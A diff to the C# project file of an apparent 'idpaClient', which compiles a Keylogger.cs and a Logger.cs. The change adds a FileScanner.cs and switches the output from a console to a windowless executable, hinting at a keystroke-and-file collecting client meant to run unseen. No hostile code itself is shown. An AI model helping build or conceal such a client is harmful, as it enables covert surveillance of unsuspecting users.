--- a/Client/idpaClient/idpaClient.csproj
+++ b/Client/idpaClient/idpaClient.csproj
@@ -5,7 +5,7 @@
     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
     <ProjectGuid>{F077087F-D3CD-4E5C-BF59-014B38B24297}</ProjectGuid>
-    <OutputType>Exe</OutputType>
+    <OutputType>WinExe</OutputType>
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <RootNamespace>idpaClient</RootNamespace>
     <AssemblyName>idpaClient</AssemblyName>
@@ -82,6 +82,7 @@
     <Reference Include="System.Xml" />
   </ItemGroup>
   <ItemGroup>
+    <Compile Include="FileScanner.cs" />
     <Compile Include="Logger.cs" />
     <Compile Include="Keylogger.cs">
       <SubType>Form</SubType>
